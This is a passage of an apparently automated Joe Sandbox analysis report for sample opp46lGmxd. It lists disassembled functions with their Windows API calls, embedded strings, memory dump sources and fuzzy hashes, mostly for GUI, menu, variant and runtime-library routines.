                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                      • String ID:
                                                      • API String ID: 641708696-0
                                                      • Opcode ID: 88384febb585986ba2cd52ae73f69e87a1f3479d9f74e81f958d1bed9d9b9946
                                                      • Instruction ID: 3004f8ee2f8b4178021aec0f46ce8a6b105239765f68bb6cf8b8a43203aabefa
                                                      • Opcode Fuzzy Hash: 88384febb585986ba2cd52ae73f69e87a1f3479d9f74e81f958d1bed9d9b9946
                                                      • Instruction Fuzzy Hash: 5A617931614A50EFCB35DF14EE88B2AB7F1FB40316F108569E5429B9A0CB71AC92DF90
                                                      Function 00A621A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A625DB: GetWindowLongW.USER32(?,000000EB), ref: 00A625EC
                                                      • GetSysColor.USER32(0000000F), ref: 00A621D3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ColorLongWindow
                                                      • String ID:
                                                      • API String ID: 259745315-0
                                                      • Opcode ID: ba42bbe2034645db0ad563ab775d8d96becaecbcc97644def28957fdbdaef1e0
                                                      • Instruction ID: 55665642e167841235151f0fcd3b62b8cdec7cc0ed8b43ac1c47918ced702d37
                                                      • Opcode Fuzzy Hash: ba42bbe2034645db0ad563ab775d8d96becaecbcc97644def28957fdbdaef1e0
                                                      • Instruction Fuzzy Hash: 04417E311009849EDB259F78EC98BB93BB5EB06331F248365FE658E1E6C7318D42DB61
                                                      Function 00ACAB12 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CharLowerBuffW.USER32(?,?,00AEF910), ref: 00ACAB76
                                                      • GetDriveTypeW.KERNEL32(00000061,00B1A620,00000061), ref: 00ACAC40
                                                      • _wcscpy.LIBCMT ref: 00ACAC6A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: BuffCharDriveLowerType_wcscpy
                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                      • API String ID: 2820617543-1000479233
                                                      • Opcode ID: 89fe27547e2304ccebd2ec9f4b583ab865cf368b5cff533f5614b0c33b6a2d00
                                                      • Instruction ID: fc332f34f423246b928f5de3cab870e11cd0320e20e0f64c60a1760707bd7c82
                                                      • Opcode Fuzzy Hash: 89fe27547e2304ccebd2ec9f4b583ab865cf368b5cff533f5614b0c33b6a2d00
                                                      • Instruction Fuzzy Hash: F051AE312083059FC710EF14C991EAAB7B6EFA0318F55482DF4969B2A2DB31AD49CB53
                                                      Function 00A69997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: __i64tow__itow__swprintf
                                                      • String ID: %.15g$0x%p$False$True
                                                      • API String ID: 421087845-2263619337
                                                      • Opcode ID: 6679628f68e7a96e7533cbcf1b320053e26bf3f816a2df29dde492eb1cde2cb5
                                                      • Instruction ID: 459a0176ca98648986e9c2a15d248f4363b326cd9feb8382eb05e1a4232b3e22
                                                      • Opcode Fuzzy Hash: 6679628f68e7a96e7533cbcf1b320053e26bf3f816a2df29dde492eb1cde2cb5
                                                      • Instruction Fuzzy Hash: 4341C072604205AFEF24AB78DD42F7BB7F8EB44310F2048AEE549D72A5EA719D41CB11
                                                      Function 00AE73C1 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 00AE73D9
                                                      • CreateMenu.USER32 ref: 00AE73F4
                                                      • SetMenu.USER32(?,00000000), ref: 00AE7403
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AE7490
                                                      • IsMenu.USER32(?), ref: 00AE74A6
                                                      • CreatePopupMenu.USER32 ref: 00AE74B0
                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00AE74DD
                                                      • DrawMenuBar.USER32 ref: 00AE74E5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                      • String ID: 0$F
                                                      • API String ID: 176399719-3044882817
                                                      • Opcode ID: f456afa61f79ada4366ce127fc2338b3c2bb5721959ced520afadb22b1d30362
                                                      • Instruction ID: a7eed4890d6668c4392a775b04c07ed1fae1f6f97561bb4816c466bbe6f4eed3
                                                      • Opcode Fuzzy Hash: f456afa61f79ada4366ce127fc2338b3c2bb5721959ced520afadb22b1d30362
                                                      • Instruction Fuzzy Hash: 53413875A01285EFDB20DFA5D884A9ABBF5FF49310F144029E9559B3A0DB31A910DF60
                                                      Function 00AE772A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00AE77CD
                                                      • CreateCompatibleDC.GDI32(00000000), ref: 00AE77D4
                                                      • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00AE77E7
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00AE77EF
                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 00AE77FA
                                                      • DeleteDC.GDI32(00000000), ref: 00AE7803
                                                      • GetWindowLongW.USER32(?,000000EC), ref: 00AE780D
                                                      • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00AE7821
                                                      • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00AE782D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                      • String ID: static
                                                      • API String ID: 2559357485-2160076837
                                                      • Opcode ID: 16c46a080ad80fb73241bfb2a67c70ebd33bcd7b29f46ef3130b8bacaa3d8ac6
                                                      • Instruction ID: 3dc423a6f033c750f2d3e20b114934ca708d0529b7e17b7678f19a556d0f16e2
                                                      • Opcode Fuzzy Hash: 16c46a080ad80fb73241bfb2a67c70ebd33bcd7b29f46ef3130b8bacaa3d8ac6
                                                      • Instruction Fuzzy Hash: AA319C32105295BFDF119FA5DC48FEB3B69FF09320F110224FA15AA0A0CB31D822DBA4
                                                      Function 00A87040 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 00A8707B
                                                        • Part of subcall function 00A88D68: __getptd_noexit.LIBCMT ref: 00A88D68
                                                      • __gmtime64_s.LIBCMT ref: 00A87114
                                                      • __gmtime64_s.LIBCMT ref: 00A8714A
                                                      • __gmtime64_s.LIBCMT ref: 00A87167
                                                      • __allrem.LIBCMT ref: 00A871BD
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A871D9
                                                      • __allrem.LIBCMT ref: 00A871F0
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A8720E
                                                      • __allrem.LIBCMT ref: 00A87225
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A87243
                                                      • __invoke_watson.LIBCMT ref: 00A872B4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                      • String ID:
                                                      • API String ID: 384356119-0
                                                      • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                                      • Instruction ID: 5472d37e4c038af4dcdd618c4b3bd57b6a5ef19705f128b7fccd232a7c30c831
                                                      • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                                      • Instruction Fuzzy Hash: 4E71B572A04716ABEB14BF79CD81BAEB3F8AF15724F24422AF514E6681F770DD408790
                                                      Function 00AC2A16 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 00AC2A31
                                                      • GetMenuItemInfoW.USER32(00B26890,000000FF,00000000,00000030), ref: 00AC2A92
                                                      • SetMenuItemInfoW.USER32(00B26890,00000004,00000000,00000030), ref: 00AC2AC8
                                                      • Sleep.KERNEL32(000001F4), ref: 00AC2ADA
                                                      • GetMenuItemCount.USER32(?), ref: 00AC2B1E
                                                      • GetMenuItemID.USER32(?,00000000), ref: 00AC2B3A
                                                      • GetMenuItemID.USER32(?,-00000001), ref: 00AC2B64
                                                      • GetMenuItemID.USER32(?,?), ref: 00AC2BA9
                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00AC2BEF
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AC2C03
                                                      • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AC2C24
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                      • String ID:
                                                      • API String ID: 4176008265-0
                                                      • Opcode ID: 7ece74779ee394b64225b9b500d0d919d8a4449b8b96367395f6969791ec6abf
                                                      • Instruction ID: defe9c2cc937e89a70a2ce51b346175fb6236a9d093dd4dba8471843a724266f
                                                      • Opcode Fuzzy Hash: 7ece74779ee394b64225b9b500d0d919d8a4449b8b96367395f6969791ec6abf
                                                      • Instruction Fuzzy Hash: 4C619DB0904249EFDB21CFA4C988FBEBBB8EB41344F16456DE841A7251DB31AD16DB21
                                                      Function 00AE7192 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00AE7214
                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00AE7217
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00AE723B
                                                      • _memset.LIBCMT ref: 00AE724C
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00AE725E
                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00AE72D6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$LongWindow_memset
                                                      • String ID:
                                                      • API String ID: 830647256-0
                                                      • Opcode ID: b9c9e071841d90f6854085cb28bae43b7bf77a7e0f96cb8b585b6de2f092a322
                                                      • Instruction ID: e0a690ad66f5124d6b8552a20a41ecb181b83f44fbb8823eba56f8d4a94da5ba
                                                      • Opcode Fuzzy Hash: b9c9e071841d90f6854085cb28bae43b7bf77a7e0f96cb8b585b6de2f092a322
                                                      • Instruction Fuzzy Hash: 76618D71900288AFDB21DFA4CC81EEE77F8EB09700F14015AFA15AB2A1D770AD42DB60
                                                      Function 00AB710E Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00AB7135
                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 00AB718E
                                                      • VariantInit.OLEAUT32(?), ref: 00AB71A0
                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00AB71C0
                                                      • VariantCopy.OLEAUT32(?,?), ref: 00AB7213
                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00AB7227
                                                      • VariantClear.OLEAUT32(?), ref: 00AB723C
                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 00AB7249
                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00AB7252
                                                      • VariantClear.OLEAUT32(?), ref: 00AB7264
                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00AB726F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                      • String ID:
                                                      • API String ID: 2706829360-0
                                                      • Opcode ID: d4731310f3d768633427003b89f4428c24de27e27bd41ac62c35f87936cd49ec
                                                      • Instruction ID: 1e7de2766b2a35f00e9ca1ed73d742073566f6ab26f64d27bc0b25850e076850
                                                      • Opcode Fuzzy Hash: d4731310f3d768633427003b89f4428c24de27e27bd41ac62c35f87936cd49ec
                                                      • Instruction Fuzzy Hash: CF4144759041199FCF00DFA8D984DEEBBB9FF48354F008065F955AB262CB70A946CB90
                                                      Function 00AD5A45 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • WSAStartup.WSOCK32(00000101,?), ref: 00AD5AA6
                                                      • inet_addr.WSOCK32(?,?,?), ref: 00AD5AEB
                                                      • gethostbyname.WSOCK32(?), ref: 00AD5AF7
                                                      • IcmpCreateFile.IPHLPAPI ref: 00AD5B05
                                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00AD5B75
                                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00AD5B8B
                                                      • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00AD5C00
                                                      • WSACleanup.WSOCK32 ref: 00AD5C06
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                      • String ID: Ping
                                                      • API String ID: 1028309954-2246546115
                                                      • Opcode ID: 643d2374570cc2c090ba4ff529277f5af868f77c2ff55ba951a0bdb1f72b5b34
                                                      • Instruction ID: 723add6a098fbabf798c3093ab59fd6b03823e61996a1a98dad7f9da78028d06
                                                      • Opcode Fuzzy Hash: 643d2374570cc2c090ba4ff529277f5af868f77c2ff55ba951a0bdb1f72b5b34
                                                      • Instruction Fuzzy Hash: 20516B31A047009FDB21EF74C989B2AB7F4EF48750F14892BF556DB2A1EB70E9418B45
                                                      Function 00ACB72E Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 00ACB73B
                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00ACB7B1
                                                      • GetLastError.KERNEL32 ref: 00ACB7BB
                                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 00ACB828
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                      • API String ID: 4194297153-14809454
                                                      • Opcode ID: 701b9099a869e721f411963f989070b496c4405cd7e349fa75a400bb1cfe07a1
                                                      • Instruction ID: abd1e108edab28c8226fe14f1548fe50248f7ad12a6e20a4564eb86b1fd97572
                                                      • Opcode Fuzzy Hash: 701b9099a869e721f411963f989070b496c4405cd7e349fa75a400bb1cfe07a1
                                                      • Instruction Fuzzy Hash: 49319435A112099FDB00EF64C986FEE7BB8EF44700F15406DE902DB291DB729D42C761
                                                      Function 00AB9471 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A67F41: _memmove.LIBCMT ref: 00A67F82
                                                        • Part of subcall function 00ABB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00ABB0E7
                                                      • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00AB94F6
                                                      • GetDlgCtrlID.USER32 ref: 00AB9501
                                                      • GetParent.USER32 ref: 00AB951D
                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00AB9520
                                                      • GetDlgCtrlID.USER32(?), ref: 00AB9529
                                                      • GetParent.USER32(?), ref: 00AB9545
                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 00AB9548
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 1536045017-1403004172
                                                      • Opcode ID: bc14236dfb1cc55b51c7719cf0195e598236054ebecaa0f04aff21bf03f325f8
                                                      • Instruction ID: bf2cad5d223125f670ccc5546738f652e298fcbe78dc74b16561a332bf6f019c
                                                      • Opcode Fuzzy Hash: bc14236dfb1cc55b51c7719cf0195e598236054ebecaa0f04aff21bf03f325f8
                                                      • Instruction Fuzzy Hash: 7E21E270900284AFDF04EBA0CCC5EFEBB79EF55300F104155B661972E2DB759919DB20
                                                      Function 00AB955C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A67F41: _memmove.LIBCMT ref: 00A67F82
                                                        • Part of subcall function 00ABB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00ABB0E7
                                                      • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00AB95DF
                                                      • GetDlgCtrlID.USER32 ref: 00AB95EA
                                                      • GetParent.USER32 ref: 00AB9606
                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00AB9609
                                                      • GetDlgCtrlID.USER32(?), ref: 00AB9612
                                                      • GetParent.USER32(?), ref: 00AB962E
                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 00AB9631
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 1536045017-1403004172
                                                      • Opcode ID: 6077d7edc3ae42138853d3fc83f5463e2f95dc4e7ea5676525ddb695c7a08cfb
                                                      • Instruction ID: 610c4d8c2e5588916debf2efdb80cad74034a0d692dc22fa5e0c9608ba086a0a
                                                      • Opcode Fuzzy Hash: 6077d7edc3ae42138853d3fc83f5463e2f95dc4e7ea5676525ddb695c7a08cfb
                                                      • Instruction Fuzzy Hash: 7A21D070A00284BFDF00EBA4CCD5EFEBBB9EF58300F104155BA61972A2DB759919DB20
                                                      Function 00AB9645 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetParent.USER32 ref: 00AB9651
                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00AB9666
                                                      • _wcscmp.LIBCMT ref: 00AB9678
